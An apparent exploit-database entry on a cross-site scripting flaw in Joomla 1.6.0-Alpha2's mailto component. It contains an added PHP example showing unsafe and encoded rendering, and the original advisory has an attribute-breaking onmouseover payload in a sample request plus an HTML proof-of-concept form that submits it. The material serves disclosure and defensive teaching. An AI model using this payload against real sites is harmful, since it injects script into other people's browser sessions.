Vendor: Joomla
By: mega-itec.com
CVSS: 8,8 (HIGH)
XSS (POST) mailto,subject,from,sender
CWE: 79
Product Name: Joomla
Affected Version From: 1.6.0-Alpha2
Affected Version To: 1.6.0-Alpha2
Patch Exists: No
Related CWE: N/A
CPE: a:joomla:joomla:1.6.0-alpha2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: [relevant os]
2010

Joomla_1.6.0-Alpha2 XSS Vulnerabilities

Joomla 1.6.0-Alpha2 contains a cross-site scripting vulnerability in the mailto component (com_mailto): an attacker can inject malicious JavaScript code into the mailto, subject, from, and sender fields. This can be exploited to execute arbitrary HTML and script code in a user's browser session, in the context of an affected site, when the malicious link is clicked.

Mitigation:

Ensure that user input is properly validated and filtered before being used in the application.
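
The mitigation above, as an added PHP example that is not Joomla's own code: the same form field rendered without and with attribute-context encoding, plus input validation as a second layer. All function names are hypothetical, and the sample request is constructed from the field values in the advisory below.

```php
<?php
// Added example, not Joomla code; all function names are hypothetical.

// Vulnerable pattern: a request value echoed into a quoted attribute as-is.
function render_field_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '" />';
}

// Hardened: encode for the HTML attribute context. ENT_QUOTES escapes both
// quote styles; ENT_SUBSTITUTE turns invalid UTF-8 bytes into U+FFFD
// instead of making htmlspecialchars() return an empty string.
function render_field_safe(string $name, string $value): string
{
    $flags = ENT_QUOTES | ENT_SUBSTITUTE;
    return '<input type="text" name="' . htmlspecialchars($name, $flags, 'UTF-8')
        . '" value="' . htmlspecialchars($value, $flags, 'UTF-8') . '" />';
}

// Second layer: validate on input. Address fields must parse as e-mail
// addresses; free-text fields must be valid UTF-8 without control characters.
function invalid_mailto_fields(array $post): array
{
    $bad = [];
    foreach (['mailto', 'from'] as $field) {
        if (filter_var($post[$field] ?? '', FILTER_VALIDATE_EMAIL) === false) {
            $bad[] = $field;
        }
    }
    foreach (['sender', 'subject'] as $field) {
        $v = $post[$field] ?? '';
        if (!is_string($v) || preg_match('//u', $v) !== 1 || preg_match('/[\x00-\x1F\x7F]/', $v) === 1) {
            $bad[] = $field;
        }
    }
    return $bad;
}

// Constructed request: the field values from the advisory, URL-decoded.
$post = [
    'mailto'  => "\xF6\" onmouseover=prompt(406426661849)//",
    'sender'  => 'mega-itec@mega-ite.com',
    'from'    => 'mega-itec@mega-ite.com',
    'subject' => 'mega-itec@mega-ite.com',
];
echo render_field_unsafe('mailto', $post['mailto']), "\n"; // attribute breaks out
echo render_field_safe('mailto', $post['mailto']), "\n";   // quote becomes &quot;
echo 'rejected: ', implode(', ', invalid_mailto_fields($post)), "\n";
```

Output encoding is the control that closes the hole; the validation step only narrows what reaches the template and should not be relied on alone.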
Source

Exploit-DB raw data:

# Title:Joomla_1.6.0-Alpha2 XSS Vulnerabilities 
# Date: 2010-05-02
# Author: mega-itec.com
# Software Link: http://joomlacode.org/gf/download/frsrelease/11322/45252/Joomla_1.6.0-Alpha2-Full-Package.zip
# Version: 1.6.0-alpha2
# Tested on: [relevant os]
# CVE : 
# Code : 
[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
>> General Information
Advisory/Exploit Title = Joomla_1.6.0-Alpha2 XSS Vulnerabilities 
Author = mega-itec security team
Contact = securite@mega-itec.com 
 
[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
>> Product information
Name = Joomla
Vendor = Joomla
Vendor Website = http://www.joomla.org/
Affected Version(s) = 1.6.0-Alpha2
 
  
[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
>> #1 Vulnerability
Type = XSS ( POST ) mailto,subject,from,sender 
Example URI = option=com_mailto&task=user%2Elogin&32720689cad34365fbe10002f91e50a9=1&mailto=%F6"+onmouseover=prompt(406426661849)//&sender=mega-itec@mega-ite.com&from=mega-itec@mega-ite.com&subject=mega-itec@mega-ite.com&layout=default&tmpl=component&link=encode link with base 64
 
>> #2 html code exploit : 
<form action="http://localhost/Joomla_1.6.0-Alpha2-Full-Package/index.php"
name="mailtoForm" method="post">

<div style="padding: 10px;">
	<div style="text-align:right">
		<a href="javascript: void window.close()">
			Close Window <img
src="http://localhost/Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png"
border="0" alt="" title="" /></a>
	</div>

	<h2>
		E-mail this link to a friend.	</h2>

	<p>
		E-mail to:
		<br />
		<input type="text" name="mailto" class="inputbox" size="25" value="&#65533;"
onmouseover=prompt(406426661849)//"/>
	</p>

	<p>
		Sender:
		<br />
		<input type="text" name="sender" class="inputbox"
value="mega-itec@mega-ite.com" size="25" />
	</p>

	<p>
		Your E-mail:
		<br />
		<input type="text" name="from" class="inputbox"
value="mega-itec@mega-ite.com" size="25" />
	</p>

	<p>
		Subject:
		<br />
		<input type="text" name="subject" class="inputbox"
value="mega-itec@mega-ite.com" size="25" />
	</p>

	<p>
		<button class="button" onclick="return submitbutton('send');">
			Send		</button>
		<button class="button" onclick="window.close();return false;">
			Cancel		</button>
	</p>
</div>

	<input type="hidden" name="layout" value="default" />
	<input type="hidden" name="option" value="com_mailto" />
	<input type="hidden" name="task" value="send" />
	<input type="hidden" name="tmpl" value="component" />
	<input type="hidden" name="link" value="encode you link with base64" />
	<input type="hidden" name="4b42dc29b4b226460d1b510634e21864" value="1"
/></form>
 
 
[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
>> Misc
mega-itec.com ::: mega-itec security team 
 
 
[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]